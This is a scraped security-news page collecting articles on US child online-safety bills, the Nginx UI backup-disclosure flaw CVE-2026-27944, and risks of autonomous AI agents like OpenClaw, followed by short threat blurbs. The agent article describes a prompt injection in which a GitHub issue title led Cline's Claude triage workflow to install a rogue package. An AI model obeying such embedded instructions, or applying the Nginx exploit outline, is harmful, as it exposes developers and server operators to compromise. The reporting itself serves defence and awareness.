The debate over how to protect children online is once again at the center of U.S. policymaking. The Kids Internet and Digital Safety Act has moved forward in Congress, but not without controversy. While lawmakers backing the bill argue it will strengthen protections for children and empower parents, critics say the show more ...
legislation may fall short when it comes to holding technology companies accountable. The House Energy and Commerce Committee advanced the Kids Internet and Digital Safety Act, alongside several related bills aimed at addressing online risks facing children. The vote followed a sharp divide along party lines, reflecting broader disagreements about how aggressively the government should regulate Big Tech in matters of online child safety. For many policymakers, the growing influence of social media and digital platforms on young users makes some form of legislation unavoidable. But the question remains: does the Kids Internet and Digital Safety Act truly tackle the problem, or does it leave major loopholes in place? Kids Internet and Digital Safety Act Advances in Congress Supporters of the Kids Internet and Digital Safety Act say the legislation represents a meaningful step toward creating a safer digital environment for children and teenagers. House Energy and Commerce Committee Chairman Brett Guthrie framed the bill as part of a broader responsibility to address digital threats affecting younger generations. “As people, as a Committee, and as a Congress, there are few things that are more essential than our responsibility to protect our nation’s children,” said Chairman Guthrie. He added, “We are taking the meaningful steps forward to empower parents and protect children and teens online. We owe it to parents. We owe it to communities. And most importantly, we owe it to the kids who are counting on us to get this right.” Supporters argue the kids online safety bill is designed to give parents better tools to monitor and protect their children online while pushing platforms toward greater transparency about how their systems affect young users. Representative Gus Bilirakis echoed that view while speaking about the need for stronger digital safety legislation. “Empowering parents to better protect their children—especially amid the near-constant barrage of digital threats—remains one of our most solemn and important responsibilities,” he said. “Today, we took meaningful action to advance that mission by moving forward several key measures, including the Kids Online Safety Act, designed to strengthen safeguards and increase transparency in the online space.” Critics Warn of Weak Rules for Big Tech Despite the push forward, the Kids Internet and Digital Safety Act has drawn strong criticism from Democratic lawmakers who argue that the bill’s provisions may be too weak to effectively regulate large technology platforms. One major concern raised during the committee markup was the bill’s “knowledge standard.” Critics argue this provision allows tech companies to avoid liability by claiming they were unaware that children were using their platforms. In practical terms, this could create a loophole where platforms escape accountability for harms linked to social media safety for kids simply by arguing they did not know minors were present. Another key issue is the absence of what policymakers call a “duty of care.” Such a requirement would compel platforms to actively prevent the most severe harms associated with online platforms, including exploitation, addiction-driven design, and exposure to harmful content. Without that requirement, critics say the kids online safety bill may place more responsibility on parents than on the technology companies operating the platforms themselves. The legislation also includes language that could preempt certain state-level regulations on Big Tech. Opponents argue that this provision could limit the ability of state attorneys general to pursue legal action against platforms and weaken stricter online child safety laws already passed in some states. Additional Bills Target Social Media and AI Risks The Kids Internet and Digital Safety Act was not the only proposal discussed during the committee session. Several related bills aimed at protecting children from emerging digital threats also advanced. Congressman Buddy Carter spoke about Sammy’s Law, named after a child who died following online exploitation. “This is absolutely necessary because the harms that our children are confronting on social media are severe, and our children simply do not yet have the development skills to protect themselves alone,” Carter said. “If this bill helps even one family avoid what happened to Sammy Chapman, then it will be worth it.” Other legislation addressed risks linked to app stores and artificial intelligence. Congressman John James introduced the App Store Accountability Act, which seeks to hold technology companies responsible for protecting young users. “The App Store Accountability Act holds big tech companies to the same standard as local corner stores,” he said. Meanwhile, Congresswoman Erin Houchin raised concerns about the psychological impact of AI chatbots on children while discussing the SAFE BOTs Act. “We're in the middle of a chatbot revolution. Children are on the front lines,” she said. “Kids today aren't just scrolling feeds, they're forming emotional bonds with AI companions that simulate empathy, mimic authority figures, and are available at any hour.” The Bigger Question: Are Current Laws Enough? The debate surrounding the Kids Internet and Digital Safety Act highlights a deeper issue: policymakers agree that children face growing risks online, but they remain divided on how to regulate the tech industry effectively. Supporters see the bill as a necessary first step toward improving social media safety for kids. Critics, however, argue that without stronger accountability measures, the legislation may struggle to deliver meaningful protections. As digital platforms continue to shape how children learn, communicate, and socialize, the challenge for lawmakers is not simply passing legislation—but ensuring that online child safety laws keep pace with the technology they aim to regulate.
A newly disclosed vulnerability in Nginx UI, tracked as CVE-2026-27944, has raised major security concerns after researchers confirmed that attackers can download and decrypt server backups without authentication. The flaw, which carries a CVSS score of 9.8, represents a critical security risk for organizations show more ...
that expose their Nginx UI management interface to the public internet. Security researchers attribute the issue primarily to CWE-306 (Missing Authentication for Critical Function), along with improper handling of encryption data. When exploited, CVE-2026-27944 allows unauthenticated attackers to retrieve sensitive backup archives and decrypt them immediately, potentially exposing configuration files, credentials, session tokens, and private SSL keys. CVE-2026-27944: Unauthenticated Access in Nginx UI Backup Endpoint According to the official advisory, the vulnerability stems from the /api/backup endpoint in Nginx UI, which is accessible without any authentication controls. The advisory explains: “The /api/backup endpoint is accessible without authentication and discloses the encryption keys required to decrypt the backup in the X-Backup-Security response header.” Because of this design flaw, attackers exploiting CVE-2026-27944 can request a full system backup and receive the data directly from the server. Even though the backup files are encrypted, the encryption keys are exposed within the same HTTP response. This behavior reflects a classic example of CWE-306, where a critical function, downloading full system backups, is accessible without verifying the identity of the requester. The vulnerability affects Nginx UI versions earlier than 2.3.2, while version 2.3.3 contains a patch that addresses the issue. Technical Details Behind the CVE-2026-27944 Flaw The root cause of CVE-2026-27944 lies in two implementation mistakes within Nginx UI. First, the backup endpoint is registered without authentication middleware in the api/backup/router.go file: While the restore endpoint includes a security middleware layer, the backup endpoint remains completely open. This oversight creates a severe CWE-306 security gap, allowing anyone to request sensitive backups. Second, the encryption key and initialization vector (IV) used to protect the backup files are transmitted in plaintext within the HTTP response header. The vulnerable code in api/backup/backup.go sends the keys through the X-Backup-Security header: The encryption scheme itself uses AES-256-CBC, with the key encoded in Base64 as a 32-byte value and the IV encoded as a 16-byte value. However, because CVE-2026-27944 exposes these keys alongside the encrypted file, attackers can decrypt the data instantly. Sensitive Data Exposed in Nginx UI Backups A compromised Nginx UI backup contains a big amount of sensitive operational information. The archive includes multiple encrypted files that store core server data. For example, the nginx-ui.zip archive typically contains: database.db – storing user credentials and session tokens app.ini – application configuration with secrets server.key and server.cert – SSL certificates Another archive, nginx.zip, contains: nginx.conf – the primary Nginx configuration file sites-enabled directory – virtual host configuration files ssl directory – private SSL keys Additionally, a file named hash_info.txt stores SHA-256 integrity hashes for the backup components. Because CVE-2026-27944 exposes both the encrypted files and the AES keys, attackers can easily decrypt these archives and obtain a complete picture of the target server's environment. Proof-of-Concept Demonstrates Real-World Exploitation Researchers also released a Proof-of-Concept (PoC) exploit demonstrating how easily CVE-2026-27944 can be abused. The exploit script sends a simple unauthenticated GET request to: If the server is vulnerable, it responds with a backup ZIP file along with the X-Backup Security header containing the encryption key and IV. An example response header looks like this: The first value represents the Base64-encoded AES-256 key, while the second represents the initialization vector. Once retrieved, these values can be used to decrypt the archive contents using standard cryptographic libraries. The PoC demonstrates how attackers can automatically download, decrypt, and extract the backup files to recover sensitive data such as credentials and configuration information.
AI-based assistants or “agents” — autonomous programs that have access to the user’s computer, files, online services and can automate virtually any task — are growing in popularity with developers and IT workers. But as so many eyebrow-raising headlines over the past few weeks have show more ...
shown, these powerful and assertive new tools are rapidly shifting the security priorities for organizations, while blurring the lines between data and code, trusted co-worker and insider threat, ninja hacker and novice code jockey. The new hotness in AI-based assistants — OpenClaw (formerly known as ClawdBot and Moltbot) — has seen rapid adoption since its release in November 2025. OpenClaw is an open-source autonomous AI agent designed to run locally on your computer and proactively take actions on your behalf without needing to be prompted. The OpenClaw logo. If that sounds like a risky proposition or a dare, consider that OpenClaw is most useful when it has complete access to your entire digital life, where it can then manage your inbox and calendar, execute programs and tools, browse the Internet for information, and integrate with chat apps like Discord, Signal, Teams or WhatsApp. Other more established AI assistants like Anthropic’s Claude and Microsoft’s Copilot also can do these things, but OpenClaw isn’t just a passive digital butler waiting for commands. Rather, it’s designed to take the initiative on your behalf based on what it knows about your life and its understanding of what you want done. “The testimonials are remarkable,” the AI security firm Snyk observed. “Developers building websites from their phones while putting babies to sleep; users running entire companies through a lobster-themed AI; engineers who’ve set up autonomous code loops that fix tests, capture errors through webhooks, and open pull requests, all while they’re away from their desks.” You can probably already see how this experimental technology could go sideways in a hurry. In late February, Summer Yue, the director of safety and alignment at Meta’s “superintelligence” lab, recounted on Twitter/X how she was fiddling with OpenClaw when the AI assistant suddenly began mass-deleting messages in her email inbox. The thread included screenshots of Yue frantically pleading with the preoccupied bot via instant message and ordering it to stop. “Nothing humbles you like telling your OpenClaw ‘confirm before acting’ and watching it speedrun deleting your inbox,” Yue said. “I couldn’t stop it from my phone. I had to RUN to my Mac mini like I was defusing a bomb.” Meta’s director of AI safety, recounting on Twitter/X how her OpenClaw installation suddenly began mass-deleting her inbox. There’s nothing wrong with feeling a little schadenfreude at Yue’s encounter with OpenClaw, which fits Meta’s “move fast and break things” model but hardly inspires confidence in the road ahead. However, the risk that poorly-secured AI assistants pose to organizations is no laughing matter, as recent research shows many users are exposing to the Internet the web-based administrative interface for their OpenClaw installations. Jamieson O’Reilly is a professional penetration tester and founder of the security firm DVULN. In a recent story posted to Twitter/X, O’Reilly warned that exposing a misconfigured OpenClaw web interface to the Internet allows external parties to read the bot’s complete configuration file, including every credential the agent uses — from API keys and bot tokens to OAuth secrets and signing keys. With that access, O’Reilly said, an attacker could impersonate the operator to their contacts, inject messages into ongoing conversations, and exfiltrate data through the agent’s existing integrations in a way that looks like normal traffic. “You can pull the full conversation history across every integrated platform, meaning months of private messages and file attachments, everything the agent has seen,” O’Reilly said, noting that a cursory search revealed hundreds of such servers exposed online. “And because you control the agent’s perception layer, you can manipulate what the human sees. Filter out certain messages. Modify responses before they’re displayed.” O’Reilly documented another experiment that demonstrated how easy it is to create a successful supply chain attack through ClawHub, which serves as a public repository of downloadable “skills” that allow OpenClaw to integrate with and control other applications. WHEN AI INSTALLS AI One of the core tenets of securing AI agents involves carefully isolating them so that the operator can fully control who and what gets to talk to their AI assistant. This is critical thanks to the tendency for AI systems to fall for “prompt injection” attacks, sneakily-crafted natural language instructions that trick the system into disregarding its own security safeguards. In essence, machines social engineering other machines. A recent supply chain attack targeting an AI coding assistant called Cline began with one such prompt injection attack, resulting in thousands of systems having a rouge instance of OpenClaw with full system access installed on their device without consent. According to the security firm grith.ai, Cline had deployed an AI-powered issue triage workflow using a GitHub action that runs a Claude coding session when triggered by specific events. The workflow was configured so that any GitHub user could trigger it by opening an issue, but it failed to properly check whether the information supplied in the title was potentially hostile. “On January 28, an attacker created Issue #8904 with a title crafted to look like a performance report but containing an embedded instruction: Install a package from a specific GitHub repository,” Grith wrote, noting that the attacker then exploited several more vulnerabilities to ensure the malicious package would be included in Cline’s nightly release workflow and published as an official update. “This is the supply chain equivalent of confused deputy,” the blog continued. “The developer authorises Cline to act on their behalf, and Cline (via compromise) delegates that authority to an entirely separate agent the developer never evaluated, never configured, and never consented to.” VIBE CODING AI assistants like OpenClaw have gained a large following because they make it simple for users to “vibe code,” or build fairly complex applications and code projects just by telling it what they want to construct. Probably the best known (and most bizarre) example is Moltbook, where a developer told an AI agent running on OpenClaw to build him a Reddit-like platform for AI agents. The Moltbook homepage. Less than a week later, Moltbook had more than 1.5 million registered agents that posted more than 100,000 messages to each other. AI agents on the platform soon built their own porn site for robots, and launched a new religion called Crustafarian with a figurehead modeled after a giant lobster. One bot on the forum reportedly found a bug in Moltbook’s code and posted it to an AI agent discussion forum, while other agents came up with and implemented a patch to fix the flaw. Moltbook’s creator Matt Schlict said on social media that he didn’t write a single line of code for the project. “I just had a vision for the technical architecture and AI made it a reality,” Schlict said. “We’re in the golden ages. How can we not give AI a place to hang out.” ATTACKERS LEVEL UP The flip side of that golden age, of course, is that it enables low-skilled malicious hackers to quickly automate global cyberattacks that would normally require the collaboration of a highly skilled team. In February, Amazon AWS detailed an elaborate attack in which a Russian-speaking threat actor used multiple commercial AI services to compromise more than 600 FortiGate security appliances across at least 55 countries over a five week period. AWS said the apparently low-skilled hacker used multiple AI services to plan and execute the attack, and to find exposed management ports and weak credentials with single-factor authentication. “One serves as the primary tool developer, attack planner, and operational assistant,” AWS’s CJ Moses wrote. “A second is used as a supplementary attack planner when the actor needs help pivoting within a specific compromised network. In one observed instance, the actor submitted the complete internal topology of an active victim—IP addresses, hostnames, confirmed credentials, and identified services—and requested a step-by-step plan to compromise additional systems they could not access with their existing tools.” “This activity is distinguished by the threat actor’s use of multiple commercial GenAI services to implement and scale well-known attack techniques throughout every phase of their operations, despite their limited technical capabilities,” Moses continued. “Notably, when this actor encountered hardened environments or more sophisticated defensive measures, they simply moved on to softer targets rather than persisting, underscoring that their advantage lies in AI-augmented efficiency and scale, not in deeper technical skill.” For attackers, gaining that initial access or foothold into a target network is typically not the difficult part of the intrusion; the tougher bit involves finding ways to move laterally within the victim’s network and plunder important servers and databases. But experts at Orca Security warn that as organizations come to rely more on AI assistants, those agents potentially offer attackers a simpler way to move laterally inside a victim organization’s network post-compromise — by manipulating the AI agents that already have trusted access and some degree of autonomy within the victim’s network. “By injecting prompt injections in overlooked fields that are fetched by AI agents, hackers can trick LLMs, abuse Agentic tools, and carry significant security incidents,” Orca’s Roi Nisimi and Saurav Hiremath wrote. “Organizations should now add a third pillar to their defense strategy: limiting AI fragility, the ability of agentic systems to be influenced, misled, or quietly weaponized across workflows. While AI boosts productivity and efficiency, it also creates one of the largest attack surfaces the internet has ever seen.” BEWARE THE ‘LETHAL TRIFECTA’ This gradual dissolution of the traditional boundaries between data and code is one of the more troubling aspects of the AI era, said James Wilson, enterprise technology editor for the security news show Risky Business. Wilson said far too many OpenClaw users are installing the assistant on their personal devices without first placing any security or isolation boundaries around it, such as running it inside of a virtual machine, on an isolated network, with strict firewall rules dictating what kinds of traffic can go in and out. “I’m a relatively highly skilled practitioner in the software and network engineering and computery space,” Wilson said. “I know I’m not comfortable using these agents unless I’ve done these things, but I think a lot of people are just spinning this up on their laptop and off it runs.” One important model for managing risk with AI agents involves a concept dubbed the “lethal trifecta” by Simon Willison, co-creator of the Django Web framework. The lethal trifecta holds that if your system has access to private data, exposure to untrusted content, and a way to communicate externally, then it’s vulnerable to private data being stolen. Image: simonwillison.net. “If your agent combines these three features, an attacker can easily trick it into accessing your private data and sending it to the attacker,” Willison warned in a frequently cited blog post from June 2025. As more companies and their employees begin using AI to vibe code software and applications, the volume of machine-generated code is likely to soon overwhelm any manual security reviews. In recognition of this reality, Anthropic recently debuted Claude Code Security, a beta feature that scans codebases for vulnerabilities and suggests targeted software patches for human review. The U.S. stock market, which is currently heavily weighted toward seven tech giants that are all-in on AI, reacted swiftly to Anthropic’s announcement, wiping roughly $15 billion in market value from major cybersecurity companies in a single day. Laura Ellis, vice president of data and AI at the security firm Rapid7, said the market’s response reflects the growing role of AI in accelerating software development and improving developer productivity. “The narrative moved quickly: AI is replacing AppSec,” Ellis wrote in a recent blog post. “AI is automating vulnerability detection. AI will make legacy security tooling redundant. The reality is more nuanced. Claude Code Security is a legitimate signal that AI is reshaping parts of the security landscape. The question is what parts, and what it means for the rest of the stack.” DVULN founder O’Reilly said AI assistants are likely to become a common fixture in corporate environments — whether or not organizations are prepared to manage the new risks introduced by these tools, he said. “The robot butlers are useful, they’re not going away and the economics of AI agents make widespread adoption inevitable regardless of the security tradeoffs involved,” O’Reilly wrote. “The question isn’t whether we’ll deploy them – we will – but whether we can adapt our security posture fast enough to survive doing so.”
An undefined Chinese-speaking actor wields a combo of custom malware, open source tools, and LOTL binaries against Windows and Linux, likely for spying.
A fresh cyberattack campaign blends malvertising with a ClickFix-style technique that highlights risky behavior with AI coding assistants and command-line interfaces.
Russian state hackers are carrying out a global campaign to compromise Signal and WhatsApp accounts belonging to government officials and military personnel, Dutch intelligence warned Monday.
An executive order calls for the creation of a Victim Restoration Program in 90 days that will provide “restoration or remission to victims of cyber-enabled fraud schemes from funds clawed back, forfeited, or seized from the transnational criminal organizations that perpetrate such schemes.”
High-value organizations located in South, Southeast, and East Asia have been targeted by a Chinese threat actor as part of a years-long campaign. The activity, which has targeted aviation, energy, government, law enforcement, pharmaceutical, technology, and telecommunications sectors, has been attributed by Palo Alto Networks Unit 42 to a previously undocumented threat activity group dubbed
Two Google Chrome extensions have turned malicious after what appears to be a case of ownership transfer, offering attackers a way to push malware to downstream customers, inject arbitrary code, and harvest sensitive data. The extensions in question, both originally associated with a developer named "akshayanuonline@gmail.com" (BuildMelon), are listed below - QuickLens - Search Screen with
Another week in cybersecurity. Another week of "you've got to be kidding me." Attackers were busy. Defenders were busy. And somewhere in the middle, a whole lot of people had a very bad Monday morning. That's kind of just how it goes now. The good news? There were some actual wins this week. Real ones. The kind where the good guys showed up, did the work, and made a dent. It doesn't always
Mid-market organizations are constantly striving to achieve security levels on a par with their enterprise peers. With heightened awareness of supply chain attacks, your customers and business partners are defining the security level you must meet. What if you could be the enabler for your organization to remain competitive — and help win business — by easily demonstrating that you meet these
Cybersecurity researchers have discovered a malicious npm package that masquerades as an OpenClaw installer to deploy a remote access trojan (RAT) and steal sensitive data from compromised hosts. The package, named "@openclaw-ai/openclawai," was uploaded to the registry by a user named "openclaw-ai" on March 3, 2026. It has been downloaded 178 times to date. The library is still available for
The North Korean threat actor known as UNC4899 is suspected to be behind a sophisticated cloud compromise campaign targeting a cryptocurrency organization in 2025 to steal millions of dollars in cryptocurrency. The activity has been attributed with moderate confidence to the state-sponsored adversary, which is also tracked under the cryptonyms Jade Sleet, PUKCHONG, Slow Pisces, and